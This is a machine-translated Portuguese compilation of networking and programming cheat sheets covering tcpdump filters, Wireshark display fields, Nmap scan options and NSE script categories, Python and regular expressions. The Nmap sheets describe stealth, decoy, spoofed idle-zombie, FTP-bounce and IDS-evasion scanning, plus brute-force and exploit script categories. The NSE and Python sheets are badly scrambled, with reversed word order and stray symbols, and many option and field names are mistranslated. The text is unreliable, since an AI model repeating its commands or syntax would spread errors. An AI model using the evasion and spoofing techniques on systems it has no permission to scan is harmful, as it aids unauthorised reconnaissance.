Capture apenas tráfego IP - o filtro mais curto, mas às vezes muito útil para se livrar de protocolos de camadas inferiores, como ARP e STP:

• IP

Capture apenas tráfego unicast - útil para se livrar de ruído na rede se você quiser ver apenas o tráfego de e para sua máquina, e não, por exemplo, anúncios de transmissão e multicast:

• não transmitido e não multicast

Captura tráfego IPv6 "all nodes" (anúncio de roteador e vizinho). Pode ser usado para encontrar RAs desonestos:

• host dst ff02::1

Capturar requisições HTTP GET. Isso procura pelos bytes 'G', 'E', 'T' e ' ' (valores hexadecimais 47, 45, 54 e 20) logo após o cabeçalho TCP. "tcp[12:1] & 0xf0) >> 2" descobre o comprimento do
cabeçalho TCP. De Jefferson Ogata via lista de discussão tcpdump-workers.

• porta 80 e tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x47455420

27
19
Machine Translated by Google
FILTROS DE EXIBIÇÃO WIRESHARK · PARTE 1 pacotelife.net
Ethernet ARP
eth.addr eth.len eth.src arp.dst.hw_mac arp.proto.tamanho
eth.dst eth.lg trailer eth arp.dst.proto_ipv4 arp.proto.tipo
eth.ig eth.multicast tipo et arp.hw.tamanho arp.src.hw_mac
arp.hw.tipo arp.src.proto_ipv4
Padrão IEEE 802.1Q
arp.opcode
vlan.cfi vlan.id vlan.prioridade
vlan.etype vlan.len trailer vlan TCP
tcp.ack tcp.opções.qs
IPv4
tcp.checksum tcp.opções.saco
ip.addr ip.fragmento.sobreposição.conflito
tcp.checksum_ruim tcp.opções.saco_arquivo
ip.checksum ip.fragmento.ferramentalongfragmento
tcp.checksum_bom tcp.opções.sack_perm
ip.checksum_ruim ip.fragmentos
tcp.continuação_para tcp.opções.sack_re
ip.checksum_bom ip.hdr_len
tcp.dstport tcp.opções.carimbo_de_hora
ip.dsfield ip.host
tcp.flags tcp.opções.wscale
ip.dsfield.ce id.ip
tcp.flags.ack tcp.opções.wscale_val
ip.dsfield.dscp ip.len
tcp.bandeiras.cwr tcp.pdu.último_quadro
ip.dsfield.ect ip.dst protocolo ip
tcp.flags.ecn tcp.pdu.tamanho
ip.reassembled_in
tcp.flags.fin tcp.pdu.tempo
ip.dst_host ip.src
tcp.flags.push porta tcp
ip.flags ip.src_host
tcp.flags.reset tcp.reassembled_in
ip.flags.df ip.tos
tcp.flags.syn segmento tcp
ip.flags.mf ip.tos.custo
tcp.flags.urg tcp.segmento.erro
ip.flags.rb ip.tos.atraso
tcp.hdr_len tcp.segmento.multipletails
ip.frag_offset ip.tos.precedência
tcp.len segmento tcp sobreposição
ip.fragment ip.tos.confiabilidade
tcp.nxtseq tcp.segmento.sobreposição.conflito
ip.fragment.error ip.tos.taxa de transferência
tcp.options tcp.segmento.ferramentalongfragmento
ip.fragment.multipletails ip.ttl
tcp.options.cc segmentos tcp
ip.fragment.overlap ip.versão
tcp.options.ccecho tcp.seq
IPv6 tcp.options.ccnew tcp.srcport
ipv6.addr ipv6.hop_opt tcp.opções.echo tcp.time_delta
ipv6.class ipv6.host tcp.opções.resposta_de_echo tcp.tempo_relativo
ipv6.dst endereço_inicial_ipv6.mipv6 tcp.opções.md5 tcp.ponteiro_urgente
ipv6.dst_host comprimento_ipv6.mipv6 tcp.opções.mss tcp.tamanho_da_janela

ipv6.dst_opt ipv6.tipo_mipv6 tcp.opções.mss_val

ipv6.flow ipv6.nxt
UDP
ipv6.fragment ipv6.opt.pad1
udp.soma de verificação udp.dstport udp.srcport
ipv6.fragment.error ipv6.opt.padn
udp.checksum_ruim udp.comprimento
ipv6.fragment.more ipv6.plen
udp.checksum_bom udp.porta
ipv6.fragmento.multipletails ipv6.reassembled_in
ipv6.fragmento.deslocamento ipv6.routing_hdr Operadores Lógica
ipv6.fragmento.sobreposição ipv6.routing_hdr.addr eq ou == e ou && E lógico
ipv6.fragmento.sobreposição.conflito ipv6.routing_hdr.esquerda ne ou != ou ou || OU lógico
ipv6.fragment.toolongfragment ipv6.routing_hdr.tipo gt ou > xor ou ^^ XOR lógico
ipv6.fragments ipv6.src lt ou < não ou ! Lógico NÃO

ipv6.fragment.id ipv6.src_host ge ou >= [n] […] Operador de substring

ipv6.hlim ipv6.versão le ou <=

por Jeremy Stretch v2.0

28 20
Machine Translated by Google
FILTROS DE EXIBIÇÃO WIRESHARK · PARTE 2 pacotelife.net
Relé de quadros ICMPv6
fr.becn fr.de icmpv6.all_comp icmpv6.opção.nome_tipo.fqdn
fr.chdlctipo fr.dlci icmpv6.soma de verificação icmpv6.opção.nome_x501
fr.control fr.dlcore_control icmpv6.checksum_ruim icmpv6.opção.rsa.chave_hash
fr.controle.f fr.ea icmpv6.código icmpv6.opção.tipo
fr.control.ftype fr.fecn icmpv6.com icmpv6.ra.cur_hop_limit
fr.control.n_r fr.lower_dlci icmpv6.haad.ha_addrs icmpv6.ra.tempo_alcançável
fr.control.n_s fr.nlpid icmpv6.identificador icmpv6.ra.retrans_timer
fr.controle.p fr.segundo_dlci icmpv6.opção icmpv6.ra.roteador_tempo_de_vida
fr.control.s_ftype fr.snap.oui icmpv6.opção.cga icmpv6.serv_dns_recursivo
fr.control.u_modifier_cmd fr.snap.pid icmpv6.opção.comprimento icmpv6.tipo
fr.control.u_modifier_resp fr.snaptype icmpv6.opção.nome_tipo
fr.cr fr.terceiro_dlci
RASGAR
fr.dc fr.superior_dlci
rip.auth.passwd rip.ip rip.rota_etiqueta
PPP rip.auth.type rip.metric rip.command rip.domínio_de_roteamento
ppp.endereço ppp.direção rip.netmask rip.family rip.next_hop rip.versão
ppp.controle protocolo ppp

MPLS BGP
mpls.bottom mpls.oam.localização_de_defeito bgp.aggregator_as bgp.mp_reach_nlri_prefixo_ipv4
mpls.cw.control mpls.oam.tipo_defeito bgp.aggregator_origin bgp.mp_unreach_nlri_ipv4_prefix
mpls.cw.res mpls.oam.frequência bgp.as_path bgp.multi_exit_disc
mpls.exp mpls.oam.tipo_de_função bgp.identificador_de_cluster bgp.próximo_salto
mpls.label mpls.oam.ttsi bgp.cluster_list bgp.nlri_prefix
mpls.oam.bip16 mpls.ttl bgp.community_as bgp.origem
bgp.community_value bgp.originador_id
ICMP
bgp.local_pref bgp.tipo
icmp.checksum icmp.ident icmp.seq
bgp.mp_nlri_tnl_id bgp.prefixo_retirado
icmp.checksum_bad icmp.mtu icmp.tipo
icmp.código icmp.redir_gw HTTP

DTP http.accept http.proxy_autorização

http.accept_encoding http.proxy_conectar_host
dtp.vizinho dtp.tlv_type vtp.vizinho
http.accept_language http.porta_de_conexão_proxy
dtp.tlv_len dtp.versão
http.authbasic http.referente
VTP http.authorization http.solicitação
vtp.code vtp.vlan_info.802_10_índice http.cache_control http.request.método
vtp.conf_rev_num vtp.vlan_info.isl_vlan_id http.connection http.solicitação.uri
vtp.seguidores vtp.vlan_info.len http.content_encoding http.solicitação.versão
vtp.md vtp.vlan_info.mtu_tamanho http.content_length http.resposta
vtp.md5_digest vtp.vlan_info.status.vlan_susp http.content_type http.resposta.código
vtp.md_len vtp.vlan_info.tlv_len http.cookie http.servidor
vtp.seq_num vtp.vlan_info.tipo_tlv http.data http.set_cookie
vtp.start_value vtp.vlan_info.nome_vlan http.host http.transferência_codificação
vtp.upd_id vtp.vlan_info.nome_vlan_len http.last_modified http.agente_do_usuário
vtp.upd_ts vtp.vlan_info.tipo_vlan http.location http.www_autenticar
vtp.versão http.notification http.x_encaminhado_para
http.proxy_authenticate

por Jeremy Stretch v2.0

29 21
Machine Translated by Google

Guia de referência rápida do professor Messer para

NMAP
RESUMO DAS OPÇÕES DE ESCANEAR OPÇÕES DE PING

Requer Identifica Identifica Solicitação de eco ICMP Ping -PE, -PI

Comando
Nome da digitalização Privilegiado TCP UDP
Sintaxe TCP ACK Ping -PA[lista de portas], -PT[lista de portas]
Acesso Portos Portos

-sS TCP SYN Ping -PS[lista de portas]

Varredura TCP SYN SIM SIM NÃO

-sT Ping UDP -PU[lista de portas]

TCP connect() Varredura NÃO SIM NÃO
Ping de carimbo de data/hora ICMP -PP
Varredura furtiva FIN -sF SIM SIM NÃO

Árvore de Natal Stealth Scan -sX SIM SIM NÃO

Máscara de endereço ICMP Ping -PM

Não deixe Ping -P0, -PN, -PD

Varredura Nula Stealth -sN SIM SIM NÃO
Exigir reverso -R
Varredura de ping
-sP NÃO NÃO NÃO
Desabilitar DNS reverso -n
Detecção de versão -sV NÃO NÃO NÃO
Especificar servidores DNS --servidores-dns
Varredura UDP -sU SIM NÃO SIM
OPÇÕES DE INFORMAÇÕES EM TEMPO REAL
Varredura de protocolo IP -então SIM NÃO NÃO
Modo verboso --verboso, -v
Verificação ACK -sA SIM SIM NÃO
Rastreamento de versão --versão-rastreamento
Varredura de janela -sW SIM SIM NÃO

-sR
Rastreamento de Pacotes --pacote-rastreamento
Varredura RPC NÃO NÃO NÃO

-sL Modo de depuração --depurar, -d

Lista de digitalização NÃO NÃO NÃO
Modo interativo --interativo
Varredura ociosa -si SIM SIM NÃO
Modo não interativo --não interativo
Ataque de rejeição FTP -b NÃO SIM NÃO
SISTEMA OPERACIONAL IMPRESSÃO DIGITAL
OPÇÕES DE HOST E PORTA
Impressão digital do SO -O
Excluir alvos --excluir <host1 [,host2],...>
Limitar a varredura do sistema --osscan-limit

Excluir alvos no arquivo --excludefile <arquivo_de_exclusão>

Mais flexibilidade de adivinhação --osscan-palpite, --fuzzy
Ler alvos do arquivo -iL <nome do arquivo de entrada>
Adicional, Avançado e Agressivo -A
Escolha números aleatórios para alvos -iR <num_hosts>
DETECÇÃO DE VERSÃO
Hosts aleatórios --randomize_hosts, -rH Versão Scan -sV
Sem portas aleatórias -r
Não exclua nenhuma porta --todos os portos
Porta de origem --source-port <número da porta>
Definir intensidade da versão --versão-intensidade

Especificar protocolo ou números de porta -p <intervalo_de_portas> Habilitar luz de verificação de versão --versão-light

Modo de digitalização rápida -F Habilitar verificação de versão de tudo --versão-tudo

Criar iscas -D <isca1 [,isca2][,EU],...> INTERAÇÕES DE TEMPO DE EXECUÇÃO

Endereço de origem -S <endereço_IP> Exibir ajuda em tempo de execução ?

Interface -e <interface> Aumentar / Diminuir Verbosidade V/V

Listar Interfaces --lista de isenções Aumentar / Diminuir Depuração d/E

Aumentar/diminuir o rastreamento de pacotes p/P

OPÇÕES DE AFINAÇÃO E TEMPORIZAÇÃO
Qualquer outra chave Status da impressão

Tempo de viver --ttl

OPÇÕES DE REGISTRO

Use pacotes IP fragmentados -f, -ff Formato normal -oN <nome do arquivo de log>
Unidade Máxima de Transmissão --mtu <bytes de dados> Formato XML -oX <nome do arquivo de log>

Comprimento dos dados --data-length <bytes de dados> Formato Grepável -oG <nome do arquivo de log>

Todos os formatos -oA <nome do arquivo base>

Tempo limite do host --host-timeout <milissegundos>

Formato Script Kiddie -oS <nome do arquivo de log>

Tempo limite inicial de ida e volta --initial-rtt-timeout <milissegundos>
Continuar a digitalização --resume <nome do arquivo de log>
Tempo limite mínimo de ida e volta --min-rtt-timeout <milissegundos>
Anexar saída --acrescentar-saída
Tempo limite máximo de ida e volta --max-rtt-timeout <milissegundos>
OPÇÕES DIVERSAS

Máximo de hosts paralelos por varredura --max-hostgroup <número> Tela de referência rápida --ajuda, -h

Mínimo de hosts paralelos por varredura --min-hostgroup <número> Versão Nmap --versão, -V

Máximo de varreduras de porta paralela --max-parallelism <número> Diretório de dados --datadir <nome_do_diretório>

Anule o vetor de argumentos -q

Varreduras mínimas de porta paralela --min-parallelism <número>
Definir sinalizadores de verificação personalizados --scanflags <valor do sinalizador>
Atraso mínimo entre as sondas --scan-delay <milissegundos>
(Uriel) Maimon Digitalização -sM
Atraso máximo entre as sondas --max-scan-delay -6
Suporte IPv6

Políticas de tempo --tempo, -T<0|1|2|3|4|5> Enviar soma de verificação TCP ou UDP incorreta --badsum

http://www.ProfessorMesser.com SNC-201 Copyright © 2007 Professor Messer, LLC, Todos os direitos reservados

30 22
Machine Translated by Google

Guia de referência rápida do professor Messer para

NMAP
Identificando portas abertas com Nmap

SCAN DE SINTONIA TCP (-sS) Conexão TCP() SCAN (-sT) SCAN FIN TCP (-sF)

SCAN DE ÁRVORE DE NATAL TCP (-sX) SCAN NULO TCP (-sN) SCAN TCP PING (-sP)

VERIFICAÇÃO DE DETECÇÃO DE VERSÃO (-sV) ESCANEAR UDP (-sU) VARREDURA DE PROTOCOLO IP (-sO)

A verificação de versão identifica portas abertas com uma verificação TCP SYN...

...e então consulta a porta com uma assinatura personalizada. SCAN DE ACK TCP (-sA) SCAN DE JANELA TCP (-sW)

IDLESCAN (-sI <host zumbi:[porta-sonda]>)

Etapa 1: O Nmap envia um SYN/ACK para a estação de trabalho zumbi para induzir um Etapa 2: o Nmap envia um quadro SYN para o endereço de destino, mas falsifica o Etapa 3: O Nmap repete a sonda SYN/ACK original da estação zumbi. Se o IPID tiver
RST em retorno. Este quadro RST contém o IPID inicial que o nmap lembrará para mais endereço IP para fazer parecer que o quadro SYN foi enviado da estação de trabalho sido incrementado, então a porta que foi falsificada no quadro SYN original está aberta
tarde. zumbi. no dispositivo de destino.

ATAQUE DE REJEIÇÃO DE FTP (-b <host_de_retransmissão_ftp>)

Uma porta fechada resultará no servidor FTP informando à estação de origem que o servidor FTP não pode construir a conexão.

Uma porta aberta conclui a transferência pela conexão especificada.

http://www.ProfessorMesser.com SNC-201 Copyright © 2007 Professor Messer, LLC, Todos os direitos reservados

31 23
 Motor
padrão
scripts
Executa

Roteiros
disponível
está
Engine
Scripting
Nmap
do
scripts
de
completa
lista
Uma

-sC--
Folha

nsedoc/
nmap.org/
http://
em
disponível
Nmapv1.0
Machine Translated by Google

GUIA

grupos
em
ou
individuais
scripts
Execute
incluem:
úteis
particularmente
scripts
Alguns Português
Instituto

script
do
argumentos
de
lista
a
Use
DNS.
servidor
(AXFR)
zona
de
arquivo
um
extrair
Tenta

--
scripts
dados
de
banco
Atualizar
#

$
--
Sintaxe

<CategoriaScript>|
dns-
nmap
script

script=<NomeDoScript>|
:
:
transferência-de-zona-dns:
IPv4:
Endereço
seguinte:
ao
limitadas
estão
não
mas
incluem,
Nmap
do
script
de
categorias
As
IPv6:
Endereço
descobertos.
web
servidores
de
robots.txt
arquivos
Coleta

Categorias
host:
do
Nome
Especificação

http-robots.txt:
destino.
de
hosts
em
autenticação
a
ignore
ou
credenciais
utilize
IP:
endereços
de
Intervalo

auth:
--
CIDR:
Bloco
local.
rede
transmissão
meio
por
comando
de
linha
na
incluídos
não
hosts
descobre
alvos:
de
listas
com
arquivo
o
Use

nmap
-iL

etc.
VNC,
MySQL,
IAX,
SNMP,
http,
incluindo
protocolos,
variedade
uma
para
destino,
de
sistemas
em
senhas
adivinhar
Tenta
automatizada.
adivinhação
meio
por
senha
e
usuário
nome
de
válidas
combinações
determinar
Tenta

transmissão:
smb-bruto:

bruto:
usados.
-A
ou
-sC
quando
automaticamente
executados
são
scripts
Os
Portas

mais.
muito
e
diretório
serviços
SNMP,
informações,
públicas
fontes
meio
por
destino
de
hosts
sobre
informações
mais
aprender
tente
populares
mais
1.000
as
verifica
especificado
portas
de
intervalo
Nenhum

padrão:
$
destino.
hosts
em
serviço
negação
de
condições
causar
Pode
alvo.
sistemas
explorar
de
Tentativa populares
mais
portas
100
as
Verificar
scriptargs.
como
fornecidas
credenciais
usando
destino,
máquina
na
programas
de
série
uma
executar
Tenta
-F

alvos.
lista
na
incluídos
não
terceiros
de
sistemas
com
interagir

-- <anfitriões>
smb-psexec:

descoberta: dos:explorar:
portas
de
Lista
rede.
protocolo
de
campos
em
inesperada
entrada
Envia
maliciosa.
forma
de
alvo
máquinas
as
impactar
ou
excessivos
recursos
consumir
alvo,
o
travar
pode UDP
e
TCP
Mistura

externo:fuzzer:
--
-p<porta1>-

destino.
hosts
nos
malware
por
infecção
de
sinais
procure

intrusivo:
script-
negativa.
forma
de
alvo
o
faz
intervalo
no
inicial
porta
a
Deixar
destino.
de
hosts
pelos
falado
protocolo
ou
software
do
versão
a
Mede 1
porta
na
começa
Nmap
do
varredura
A
-p445
-p<porta1>,<porta2>,...

malware:seguro:
faz
intervalo
no
final
porta
a
Deixar
-pU:53,U:110,T20-445

conhecida.
vulnerabilidade
uma
têm
destino
de
sistemas
os
se
Mede
-r -- -p-65535-p0-

65535
porta
da
através
Nmap
Varredura

versão: vul:
1-65535
digitalização
de
Portas
-p-

24
32
smbpass=<senha>[,config=<co
 Opções
Opções

Opções
ativos)
estão
hosts
os
todos
que
(assumir
sondar
Não IDS
de
evasão
para
usado
lento,
Muito

Paranóico:

--

-Pn
Machine Translated by Google

paralelo
host
varredura
grupos
de
Tamanhos IDS
de
evasão
para
usado
lento,
Bastante
ICMP)
e
445
80,
(TCP
padrão
Sonda menos
consumir
para
Desacelera

Sorrateiro: Educado:

-PB
-T0-T1-T2
padrão
o
que
lento
mais
vezes
~10
roda
banda,
de
largura

--
min-
TCP
portas
as
sondando
ativos
estão
alvos
os
se
Verifique
sonda
de
Paralelismo alvo
do
resposta
capacidade
na
baseado
dinâmico
tempo
de
modelo
um
Padrão,

-PS<lista
Normal:

-T3
confiável
e
rápido
um
Assume

--
ICMP
eco
de
solicitação
Usar
-T4

-PE
Agressivo:

min-
sonda.
da
volta
e
ida
de
tempo
o
Especifica
ICMP
hora
data/
carimbo
de
solicitação
Use alvos
os
sobrecarregar
pode
e
networking
fará
provavelmente
agressivo;
Muito
-T5
Insano:

-PP
abertas
portas
perder
ou
alvos
sobrecarregar
ICMP
rede
máscara
de
solicitação
Use

max-

-PM
porta
varredura
sondas
de
número
o
Limita

--
retransmissões.

Tipos
--
Formatos

padrão
Nmap
Saída
porta)
varredura
não
host,
de
(descoberta
somente
Probe tempo
tanto
de
depois
alvo
do
Desistir Greppable
Formato

-sP
XML
formato
Varredura
SYN

--

-sS
sondas
as
entre
atraso
Ajustar
-oN-oG-oX -oA

para
basename
usando
XML
e
Greppable
Nmap,
saída
de
arquivos
Gerar
Varredura
Conectar
TCP

-sT
--
UDP
Varredura segundo
por
<número>
que
lentos
mais
não
pacotes
Enviar

-sU
Scan
Versão
Opções

IP
endereço
de
reversas
-n

-sV
--
IPv6
somente
Use
-6

SO
de segundo
por
<número>
que
rápido
mais
não
pacotes
Enviar

-O
está
porta
a
que
pensa
Nmap
qual
pelo
motivo
SO
o
incluindo
recursos,
vários
Use
--
-A

Script
versão,
de
Detecção
Detecção,
reason

--
traceroute
e
(padrão)
Digitalização
ordem
qualquer
em
URGACKPSHRSTSYNFIN

filtrado
ou
fechado
aberto,

25
33
 (sjd)
110105$
ver$2.01$

Funções

Folha
Estruturas
round(x,n)
$
range(x)
ord(c)
open(f)
min(s)
max(s)
list()
len(s)
(x)
int$
float(x)
dict()
abs(x) Valor$absoluto$de$x
float$x$arredondado$para$n$casas$

$
Função'

var-
Retornos'

id(obj)
$
$d$=$dict()
exemplo:
$por
Dicionário$vazio,

pow(x,y)
$
$)
[prompt]
input($
=-
var- as$float$
$int$ou$string$x-

AtribuiçãoConsole
dir(m)
ajuda(f)
ajuda(m)
$
ajuda() Invocar$interactive$help$

Ajuda
memória$addr$of$obj

var
Exibir$ajuda$para$módulo$m

$
float$ou$string$x$as$int$
Exibir$ajuda$para$função$f
$
Número$de$itens$em$sequência$s$
Machine Translated by Google

Exibir$nomes$em$módulo

m
$
$
$m$=$lista()
exemplo:
$por
Lista$vazia,

Seleção
imprimir$exp[,]
se$ $
Valor$máximo$de$itens$em$s

$
s
em
itens
de
mínimo
Valor

[elif$ $
$filename$f$para$input$
Abra
Função$chamada$
func_name(args,-)
$
$índice]
x[índice-: Fatiando$ $
[outro:
C
de
ASCII
Código
Indexação$

$
x$**$e$
Atributo$referência$
xO1
a
0
inteiros
x
de
lista
Uma

x[índice]
**

x.attribute-
Exponenciação$

Repetição'
$
Comparação$
$==$
=,
$!
$>=,
$<=,
$<,
>,
$ou$
$e,
não,
$não$em$
em,
$
% $$
$/, $mod$
$dividir,
Multiplicar,
$
soma(s) str$representação$de$objeto-
$

enquanto$
*,
$O$
+, $subtrair$
Adicionar,
Soma$de$sequências$numéricas
str(obj)

$var
para

$
tupla(itens)

em

Pequena'Tabela'de'Precedência'do'Operador'
Travessia
$
associação
de
Testes
obj
dados
de
Tipo
$

booleanos
Operadores$
tipo(obj)

$
$OU$
$E,
NÃO,

Função
$
Funções

Menor$inteiro$nbr$>=$
x

$
function_name($argumentos$) para$base$ou$natural$log$se$
Log$de$x-
$base])
[,
log(x-
floor(x)
exp(x)
radianos(x)
graus(x)
cos(x)
$
ceil(x)
$
Função'

Função
y)

$
Módulo
hipot(x,-

x$radianos$em$graus$
Retorna'(all'float)'

$
$]:
(super_classe)
[$
classe$Nome_da_classe$

x$graus$em$radianos$

def$function_name($parâmetros-):$

de$module_name
e$**$x

import$module_name-
$

Classe'Definição'
int $ Maior$whole$nbr$<=$x
Cosseno$de$x$radianos$

+
*$x
quadrada(x
raiz

TiposDigite
32Obit$Inteiro$ 3,$O4$

Literalmente

Descrição'
longo Inteiro$>$32$bits$ 101L

Objeto
flutuador$ Número$de$ponto$flutuante$ 3,0,$O6,55$ base$não$dada$

de$nome_do_módulo$importar$*$
obj_ref

complexo$ Número$complexo J$
1,2 pi
tan(x)
sqrt(x)
$
sin(x) x$**$e$
$

$
y)

Método

bool Booleano$ $Falso$

Verdadeiro, Seno$de$x$radianos$
pow(x,-

str$ Caractere$sequência$ Pitão $

tente: x
de
positiva
quadrada
Raiz

tupla$ imutável
Sequência$ (2,4,7)$ Tangente$de$x$radianos$
$

lista$ mutável
Sequência$ $3,1]$
[2,$x, Matemática$constante$pi$para$15$sig$figs$
[,
$

ditado$ Mapeamento$ $
{$x:2,$y:5$} e$
$

Matemática$constante$e$para$15$sig$figs$
Exceção'Manipulação'
exceto$
obj_ref.method_name($argumentos$)

3426
 contagem(sub)
$
centro(w)
capitalizar$

Métodos
Métodos

Métodos
S$com$primeiro$caractere$maiúsculo$ Acrescentar$obj$ao$fim$de$L
$
append(obj) $or$
read([n]) $
Retorna$str$dos$próximos$n$caracteres$de$F,
Retorna$str$up$to$next$newline,
readline([n])

S.method()
S$centrado$em$str$w$chars$wide$ Retorna$int$nbr$de$ocorrências$de$

L.method()'
F.method()'
$
contagem(obj) $EOF$se$n$não$fornecido$
até
ou

int$nbr$de$nãoOsobreposto$ $L
em

obj
int$index$da$primeira$ocorrência$de$
em$S-
ocorrências$de$sub $
índice(obj) $índice$da$primeira$ocorrência$
Retorna especificado
se
caracteres
n
máximo
no

Retorna'(str'unless'noted)'
$raises$ValueError$if$
L;
em $
leitura()
de
linhas $onde$
Retornar$lista$de$todas$as$linhas$em$F,

$
não$em$L
obj- cada$item$é$uma$linha$

de$obj
Machine Translated by Google

sub
$
édigito() $
é$todos$os$caracteres$de$dígitos,
bool$True$if$S- para$F
escreva(s) para$F-
Escreva$str$s
Escreva$tudo$str$em$seq$L-
escrevalinhas(L)
$

encontrar(sub)
contrário$
Falso$caso ou$item$no$fim$de$L$se$índice$não$

$aumenta$IndexError$se$L$é$
dado; Fecha$o$arquivo$

pop([index])
$
baixo()
mais
é superior$
é$tudo$inferior/
bool$True$if$S- $
fechar()

$
superior()
é $
contrário$
$Falso$caso
caso$chars, vazio$ou$índice$está$fora$do$intervalo$

Remove$primeira$ocorrência$de$obj
$
remove(obj)

$
$delimitado$por$S
em$a$str, $aumenta$ValueError$se$obj$é$
de$L;

junte(seq)
não$em$L
$
inferior() maiúscula$de$S-
Cópia$minúscula/
Segure
Outra'Sintaxe' $
$<Enter>$para$sair.)
raw_input(Pressione$
$
superior() ordenar()
$
inverter() $lugar$
no
$L$
Inverte

Todos$itens$em$seq-
$
lstrip() $à$final$
Cópia$de$S$com$à$frente$/ Classifica$L$no$lugar$

$
rstrip() $ou$ambos$
branco$removido,
em
espaço
$

dividir([sep]) $delimitada$por$
Lista$de$tokens$em$S,

$delimitador$
$se$sep$não$fornecido,
sep;

Métodos
é$qualquer$espaço$em$branco$
$
contagem(obj) $nbr$de$ocorrências$de$
Retorna
p$
112
`$
96
P$
80
@$
64
0$
48
SP$
32

T.method()'
Caracteres
Impedir'execução'na'importação:'

obj
33 !
q$
113
a$
97
Q$
81
A$
65
1$
49
$
$
índice(obj) $índice$da$primeira$ocorrência$
Retorna
34 r$
114
b$
98
R$
82
B$
66
2$
50
$raises$ValueError$if$
T;
em

%
s$
115
c$
99
S$
83
C$
67
3$
51
#$
35
obj$não$está$em$T

Formatando
de$obj

Sintaxe:
$
36

'format_spec
$alinhar$em$número$de$colunas$
(opcional):
largura$
u$
117
e$
101
U$
85
E$
69
5$
53
$
37%
$preceder$com$
$negativo$para$esquerdaOalinhar,
especificado;
v$
118
f$
102
V$
86
F$
70
6$
54
&$
38
0$a$zeroOpreencher

Métodos
39 w$
119
g$
103
W$
87
G$
71
7$
55
$mostrar$dígitos$especificados$de$
(opcional):
precisão$ $else$val
em$D,
$if$k
Retorna$D[k]
$
[,val])
get(k-
clear() Remover$todos$os$itens$de$D

$6$é$padrão
precisão$para$flutuantes; x$
120
h$
104
X$
88
H$
72
8$
56
($
40

D.method()'
$s$
(float),
$f$
(decimal$int),
$d$
(obrigatório):
tipo- itens()
$
tem_chave(k) $else$False$
D,
em
Retorna$True$if$k 41 )
y$
121
i$
105
Y$
89
I$
73
9$
57
$

$notação$exponencial)
(float$
$e$
(string), Retornar$lista$de$pares$chaveOvalor$em$ 58 :
*$
42
z$
122
j$
105
Z$
90
J$
74
$
Exemplos$para$x$=$123,$y$=$456.789 $
D;
+
43
$ Retorna$lista$de
[val])
pop(k,
$
keys()
$retornar$mapeado$
Remover$chave$k,
D

44 , \
92
L$
76
<$
60
$
93 ] }
M$
77
=$
61
O$
45
125
m$
109
$
$y$O>$.
%
%8,2f$
$. se$k$não$está$em$D
valor$ou$val
46 .
~$
126
n$
110
^$
94
N$
78
>$
62
$
O>$4,57e+02
$
valores() Retornar$lista$de$valores$Ds$
$.
O8sO>$Olá$. 47 ?
63
95
O$
79
$ / _$
DEL$
127
o$
111
\

3527
Machine Translated by Google

Folha de dicas sobre expressões regulares (Regex)

Caracteres especiais em expressões regulares e seus significados

Personagem Significado Exemplo

* Corresponder a zero, um ou mais dos anteriores

Ah* corresponde a "Ahhhhh" ou "A"

Corresponder a zero ou um dos

? Ah? corresponde a "Al" ou "Ah"
anteriores

Corresponda a um ou mais dos Ah+ corresponde a "Ah" ou "Ahhh", mas não

+
anteriores "UM"

Usado para escapar de um caractere

\ Hungry\? corresponde a "Hungry?"
especial

. Caractere curinga, do.* corresponde a "cachorro", "porta", "ponto", etc.

corresponde a qualquer caractere

() Personagens do grupo Veja exemplo para |

[cbf]ar corresponde a "car", "bar" ou "far"

[0-9]+ corresponde a qualquer número

inteiro positivo
[] Corresponde a uma variedade de caracteres
[a-zA-Z] corresponde às letras ascii az (maiúsculas
e minúsculas)
[^0-9] corresponde a qualquer caractere diferente
de 0-9.

Corresponde ao caractere/grupo Partidas de (segunda)|terça-feira

|
anterior OU seguinte "Segunda-feira" ou "Terça-feira"

[0-9]{3} corresponde a "315", mas não a "31"

Corresponde a um número especificado de

{} [0-9]{2,4} corresponde a "12", "123" e "1234"
ocorrências do anterior

[0-9]{2,} corresponde a "1234567..."

^http corresponde a strings que começam com

^ Início de uma string. Ou dentro de um intervalo http, como uma URL.
de caracteres [] negação. [^0-9] corresponde a qualquer caractere diferente
de 0-9.

ing$ corresponde a "exciting" mas não a

$ Fim de uma string.
"engenious"

36 28
Machine Translated by Google

Extensões. Não causam agrupamento, exceto 'P<nome>':

Python 2.7 Normal (inglês)
(?iLmsux) Corresponde a uma string vazia, define os sinalizadores re.X

Expressões (?:...) Versão não capturável de parênteses regulares

(?P<nome>...) Crie um grupo de captura nomeado.
(?P=nome) Corresponder a qualquer grupo nomeado anteriormente correspondente
(?#...) Um comentário; ignorado.
Os caracteres não especiais correspondem a si mesmos. As exceções são (?=...) Afirmação de antecipação, correspondência sem consumo
caracteres especiais: (?!...) Afirmação de previsão negativa
(?<=...) (? Afirmação Lookbehind, corresponde se precedida
<!...) Afirmação negativa de lookbehind
\ Escape de um caractere especial ou inicie uma sequência.
(?(id)s|n) Corresponder 'y' se o grupo 'id' corresponder, caso contrário 'n'
. Corresponde a qualquer caractere, exceto nova linha, veja re.DOTALL
^
Corresponde ao início da sequência, veja re.MULTILINE
Corresponder ao final da string, veja re.MULTILINE Sinalizadores para re.compile(), etc. Combine com '|':
$ [] Incluir um conjunto de caracteres correspondentes
R|S Corresponde à regex R ou à regex S. re.I == re.IGNORECASE Ignorar maiúsculas e minúsculas
() Crie um grupo de captura e indique a precedência re.L == re.LOCALE re.M == Tornar \w, \b e \s dependentes da localidade
re.MULTILINE re.S == re.DOTALL Multilinha
re.U == re.UNICODE re.X == O ponto corresponde a tudo (incluindo quebra de linha)
re.VERBOSE Tornar \w, \b, \d e \s dependentes de Unicode
Depois de '[', coloque um conjunto, os únicos caracteres especiais são: Verbose (espaço em branco não escapado no padrão
é ignorado e '#' marca as linhas de comentário)

] Termine o conjunto, se não for o 1º char

- Um intervalo, por exemplo, ac corresponde a a, b ou c Funções de nível de módulo:
^
Negue o conjunto somente se for o 1º caractere
compilar(padrão[, sinalizadores]) -> RegexObject
match(padrão, string[, sinalizadores]) -> MatchObject
Quantificadores (adicione '?' para não gananciosos): pesquisar(padrão, string[, sinalizadores]) -> MatchObject
findall(padrão, string[, flags]) -> lista de strings
finditer(padrão, string[, flags]) -> iter de MatchObjects
{m} Exatamente m repetições split(padrão, string[, maxsplit, flags]) -> lista de strings
{m,n} De m (padrão 0) a n (padrão infinito) sub(padrão, repl, string[, contagem, sinalizadores]) -> string
* 0 ou mais. O mesmo que {,} subn(padrão, repl, string[, contagem, sinalizadores]) -> (string, int)
